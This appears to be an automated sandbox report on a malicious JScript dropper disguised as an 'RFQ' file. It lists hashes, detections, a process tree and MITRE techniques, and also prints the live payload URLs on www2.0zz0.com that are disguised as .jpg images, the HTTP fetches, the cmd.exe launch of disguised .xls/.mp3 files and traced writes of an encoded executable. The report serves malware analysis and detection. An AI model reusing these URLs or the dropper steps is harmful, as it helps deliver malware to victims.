Edit tour

Windows Analysis Report
RFQ-PR 1-62557 & 38929 III.js

Overview

General Information

Sample name:	RFQ-PR 1-62557 & 38929 III.js
Analysis ID:	1615392
MD5:	335396680f20357d3ca2ffbe51f6e7a2
SHA1:	631e51f1cfd39c40c9987bee53ce25cb05b74b3a
SHA256:	93750a9917b952e019c6ed6faf8cf273cc730a6047b5ef65741c4d0c5c691278
Tags:	jsuser-abuse_ch
Infos:

Detection

Score:	88
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

JScript performs obfuscated calls to suspicious functions

Multi AV Scanner detection for submitted file

System process connects to network (likely due to code injection or exploit)

JavaScript file contains suspicious strings

Sigma detected: Script Initiated Connection to Non-Local Network

Sigma detected: WScript or CScript Dropper

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Creates a process in suspended mode (likely to inject code)

Found WSH timer for Javascript or VBS script (likely evasive script)

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Script Initiated Connection

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses a known web browser user agent for HTTP communication

Classification

Process Tree

System is w10x64

wscript.exe (PID: 4144 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ-PR 1-62557 & 38929 III.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

cmd.exe (PID: 1200 cmdline: "C:\Windows\System32\cmd.exe" /c ""C:\Users\user\AppData\Local\Temp\aqgeukibkal\shuv.xls" "C:\Users\user\AppData\Local\Temp\aqgeukibkal\gnldmmsk.mp3"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Sigma Signatures

System Summary

Sigma detected: Script Initiated Connection to Non-Local Network

Source: Network Connection

Author: frack113, Florian Roth: Data: DestinationIp: 104.21.112.1, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 4144, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ-PR 1-62557 & 38929 III.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ-PR 1-62557 & 38929 III.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ-PR 1-62557 & 38929 III.js", ProcessId: 4144, ProcessName: wscript.exe

Sigma detected: Script Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 104.21.112.1, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 4144, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ-PR 1-62557 & 38929 III.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ-PR 1-62557 & 38929 III.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ-PR 1-62557 & 38929 III.js", ProcessId: 4144, ProcessName: wscript.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://www2.0zz0.com/2025/01/31/04/195774460.jpg#	Avira URL Cloud: Label: malware
Source: https://www2.0zz0.com/2025/01/31/04/195774460.jpg/E_/E8	Avira URL Cloud: Label: malware
Source: https://www2.0zz0.com/2025/01/31/04/672996792.jpg	Avira URL Cloud: Label: malware
Source: https://www2.0zz0.com/2025/01/31/04/195774460.jpg	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: RFQ-PR 1-62557 & 38929 III.js

Virustotal: Detection: 13%

Perma Link

Source: unknown

HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49704 version: TLS 1.2

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe

Network Connect: 104.21.112.1 443

Jump to behavior

Source: Joe Sandbox View	IP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox View	IP Address: 104.21.112.1 104.21.112.1

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /2025/01/31/04/672996792.jpg HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www2.0zz0.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /2025/01/31/04/195774460.jpg HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www2.0zz0.comConnection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /2025/01/31/04/672996792.jpg HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www2.0zz0.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /2025/01/31/04/195774460.jpg HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www2.0zz0.comConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: www2.0zz0.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 14 Feb 2025 19:32:29 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tM5bIw4WfFci4WiSx5X2u%2BIfVaJIb5bcnXMCqjheCwy96VHQRlaqfwyDtj3lqdZGgglnCJW%2BstpIwMg02uAxgwL3ZKTElE%2BqGcOSLo2H36SJq1CAhSdMScLF2nCXlu4D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Strict-Transport-Security: max-age=15552000; includeSubDomains; preloadX-Content-Type-Options: nosniffServer: cloudflareCF-RAY: 911f7c0389bc43b3-EWR

Source: wscript.exe, 00000000.00000002.2088903608.0000019816559000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087277253.0000019816559000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085191683.0000019816559000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: wscript.exe, 00000000.00000003.2087632945.0000019816805000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: wscript.exe, 00000000.00000003.2087632945.0000019816805000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: wscript.exe, 00000000.00000003.2087875852.00000198182EB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085383950.00000198182E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www2.0zz0.com/2025/01/31/04/1957
Source: wscript.exe, 00000000.00000003.2086324706.000001981919C000.00000004.00000020.00020000.00000000.sdmp, RFQ-PR 1-62557 & 38929 III.js	String found in binary or memory: https://www2.0zz0.com/2025/01/31/04/195774460.jpg
Source: wscript.exe, 00000000.00000002.2089308318.0000019818FB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www2.0zz0.com/2025/01/31/04/195774460.jpg#
Source: wscript.exe, 00000000.00000003.2024121506.000001981832E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www2.0zz0.com/2025/01/31/04/195774460.jpg/E_/E8
Source: wscript.exe, 00000000.00000002.2089308318.0000019818FB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www2.0zz0.com/2025/01/31/04/195774460.jpgk
Source: wscript.exe, 00000000.00000003.2086953526.00000198187B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053256942.0000019819005000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2088150100.0000019818AB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085334086.0000019816521000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2088888179.0000019816522000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2086579467.00000198183A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087875852.00000198182EB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085295307.000001981901C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087632945.0000019816805000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2022748516.00000198185AB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085383950.00000198182E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2022946684.00000198187B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2089308318.0000019818F70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2089402259.000001981901C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085277039.0000019816515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2086752965.00000198185AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2086324706.000001981919C000.00000004.00000020.00020000.00000000.sdmp, RFQ-PR 1-62557 & 38929 III.js	String found in binary or memory: https://www2.0zz0.com/2025/01/31/04/672996792.jpg
Source: wscript.exe, 00000000.00000003.2024195004.00000198182BE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2025131758.00000198182F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www2.0zz0.com/2025/01/31/04/672996792.jpg48578894
Source: wscript.exe, 00000000.00000003.2086324706.000001981919C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www2.0zz0.com/2025/01/31/04/672996792.jpge
Source: wscript.exe, 00000000.00000002.2089113128.00000198182E8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2088035837.00000198182E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085383950.00000198182E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www2.0zz0.com/2Z%
Source: wscript.exe, 00000000.00000002.2088903608.0000019816559000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087277253.0000019816559000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085191683.0000019816559000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www2.0zz0.com/?
Source: wscript.exe, 00000000.00000002.2088903608.0000019816559000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087277253.0000019816559000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085191683.0000019816559000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www2.0zz0.com/O

Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown

HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49704 version: TLS 1.2

System Summary

JavaScript file contains suspicious strings

Source: RFQ-PR 1-62557 & 38929 III.js

Initial file: wscript.shell, adodb.stream, responsebody, cmd.exe

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}

Jump to behavior

Source: RFQ-PR 1-62557 & 38929 III.js

Initial sample: Strings found which are bigger than 50

Source: classification engine

Classification label: mal88.evad.winJS@4/4@1/1

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\195774460[1].jpg

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7120:120:WilError_03

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\aqgeukibkal

Jump to behavior

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RFQ-PR 1-62557 & 38929 III.js

Virustotal: Detection: 13%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ-PR 1-62557 & 38929 III.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ""C:\Users\user\AppData\Local\Temp\aqgeukibkal\shuv.xls" "C:\Users\user\AppData\Local\Temp\aqgeukibkal\gnldmmsk.mp3""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ""C:\Users\user\AppData\Local\Temp\aqgeukibkal\shuv.xls" "C:\Users\user\AppData\Local\Temp\aqgeukibkal\gnldmmsk.mp3""	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msdart.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Jump to behavior

Data Obfuscation

JScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: CreateTextFile("C:\Users\user\AppData\Local\Temp\aqgeukibkal\ingobxndsgvxkm.bls", "true");ITextStream.Write("[S3tt!ng]H-Hord=423034303941384431354341343743353335323330453846394431324530434345423133434632323941423433463543453841454135383031443738KeIsX=winxewDir3ctory=dxadRP=tbcj.onjsK=281sN=jogg.xdfinclud3r=fcwwefq.ipeAuEx=gnldmm");ITextStream.Close();IFileSystem3.GetSpecialFolder("2");IFileSystem3.BuildPath("Unsupported parameter type 00000009", "aqgeukibkal");IFileSystem3.FolderExists("C:\Users\user\AppData\Local\Temp\aqgeukibkal");IFileSystem3.CreateFolder("C:\Users\user\AppData\Local\Temp\aqgeukibkal");IFileSystem3.BuildPath("C:\Users\user\AppData\Local\Temp\aqgeukibkal", "ingobxndsgvxkm.bls");IFileSystem3.CreateTextFile("C:\Users\user\AppData\Local\Temp\aqgeukibkal\ingobxndsgvxkm.bls", "true");ITextStream.Write("[S3tt!ng]H-Hord=423034303941384431354341343743353335323330453846394431324530434345423133434632323941423433463543453841454135383031443738KeIsX=winxewDir3ctory=dxadRP=tbcj.onjsK=281sN=jogg.xdfinclud3r=fcwwefq.ipeAuEx=gnldmm");ITextStream.Close();IFileSystem3.GetSpecialFolder("2");IFileSystem3.BuildPath("Unsupported parameter type 00000009", "aqgeukibkal");IFileSystem3.FolderExists("C:\Users\user\AppData\Local\Temp\aqgeukibkal");IFileSystem3.BuildPath("C:\Users\user\AppData\Local\Temp\aqgeukibkal", "tbcj.onj");IFileSystem3.CreateTextFile("C:\Users\user\AppData\Local\Temp\aqgeukibkal\tbcj.onj", "true");ITextStream.Write("0x4D5*9]]3]]]04]]]FFFF]]_8]]]]]]]4]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]80/]]0E/F_*0E]_409CD2/_80/4CCD2/546869732070726F67726/6D20636/6E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0*24]]]]]]]FC29_7*4_848D9F7_848D9F7_848D9F70C");ITextStream.Close();IFileSystem3.GetSpecialFolder("2");IFileSystem3.BuildPath("Unsupported parameter type 00000009", "aqgeukibkal");IFileSystem3.FolderExists("C:\Users\user\AppData\Local\Temp\aqgeukibkal");IFileSystem3.CreateFolder("C:\Users\user\AppData\Local\Temp\aqgeukibkal");IFileSystem3.BuildPath("C:\Users\user\AppData\Local\Temp\aqgeukibkal", "ingobxndsgvxkm.bls");IFileSystem3.CreateTextFile("C:\Users\user\AppData\Local\Temp\aqgeukibkal\ingobxndsgvxkm.bls", "true");ITextStream.Write("[S3tt!ng]H-Hord=423034303941384431354341343743353335323330453846394431324530434345423133434632323941423433463543453841454135383031443738KeIsX=winxewDir3ctory=dxadRP=tbcj.onjsK=281sN=jogg.xdfinclud3r=fcwwefq.ipeAuEx=gnldmm");ITextStream.Close();IFileSystem3.GetSpecialFolder("2");IFileSystem3.BuildPath("Unsupported parameter type 00000009", "aqgeukibkal");IFileSystem3.FolderExists("C:\Users\user\AppData\Local\Temp\aqgeukibkal");IFileSystem3.BuildPath("C:\Users\user\AppData\Local\Temp\aqgeukibkal", "tbcj.onj");IFileSystem3.CreateTextFile("C:\Users\user\AppData\Local\Temp\aqgeukibkal\tbcj.onj", "true");ITextStream.Write("0x4D5*9]]3]]]04]]]FFFF]]_8]]]]]]]4]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]80/]]0E/F_*0E]_409CD2/_80/4CCD2/546869732070726F67726/6D20636/6E6E6F742062652072756E20696E20444

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: wscript.exe, 00000000.00000003.2087277253.000001981652C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085191683.0000019816528000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2088903608.000001981652C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: wscript.exe, 00000000.00000002.2089308318.0000019818F70000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.2087277253.000001981652C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085191683.0000019816528000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2088903608.000001981652C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH
Source: wscript.exe, 00000000.00000003.2085295307.000001981900D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: wscript.exe, 00000000.00000002.2089308318.0000019818F70000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe

Network Connect: 104.21.112.1 443

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ""C:\Users\user\AppData\Local\Temp\aqgeukibkal\shuv.xls" "C:\Users\user\AppData\Local\Temp\aqgeukibkal\gnldmmsk.mp3""

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	22 Scripting	Valid Accounts	Windows Management Instrumentation	22 Scripting	111 Process Injection	1 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	111 Process Injection	LSASS Memory	1 File and Directory Discovery	Remote Desktop Protocol	Data from Removable Media	3 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 DLL Side-Loading	Security Account Manager	2 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	14 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Obfuscated Files or Information	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
RFQ-PR 1-62557 & 38929 III.js	13%	Virustotal		Browse
RFQ-PR 1-62557 & 38929 III.js	8%	ReversingLabs

Source	Detection	Scanner	Label
https://www2.0zz0.com/2025/01/31/04/1957	0%	Avira URL Cloud	safe
https://www2.0zz0.com/O	0%	Avira URL Cloud	safe
https://www2.0zz0.com/2025/01/31/04/672996792.jpg48578894	0%	Avira URL Cloud	safe
https://www2.0zz0.com/2025/01/31/04/195774460.jpgk	0%	Avira URL Cloud	safe
https://www2.0zz0.com/?	0%	Avira URL Cloud	safe
https://www2.0zz0.com/2Z%	0%	Avira URL Cloud	safe
https://www2.0zz0.com/2025/01/31/04/672996792.jpge	0%	Avira URL Cloud	safe
https://www2.0zz0.com/2025/01/31/04/195774460.jpg#	100%	Avira URL Cloud	malware
https://www2.0zz0.com/2025/01/31/04/195774460.jpg/E_/E8	100%	Avira URL Cloud	malware
https://www2.0zz0.com/2025/01/31/04/672996792.jpg	100%	Avira URL Cloud	malware
https://www2.0zz0.com/2025/01/31/04/195774460.jpg	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www2.0zz0.com	104.21.112.1	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www2.0zz0.com/2025/01/31/04/672996792.jpg	true	Avira URL Cloud: malware	unknown
https://www2.0zz0.com/2025/01/31/04/195774460.jpg	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.cloudflare.com/learning/access-management/phishing-attack/	wscript.exe, 00000000.00000003.2087632945.0000019816805000.00000004.00000020.00020000.00000000.sdmp	false		high
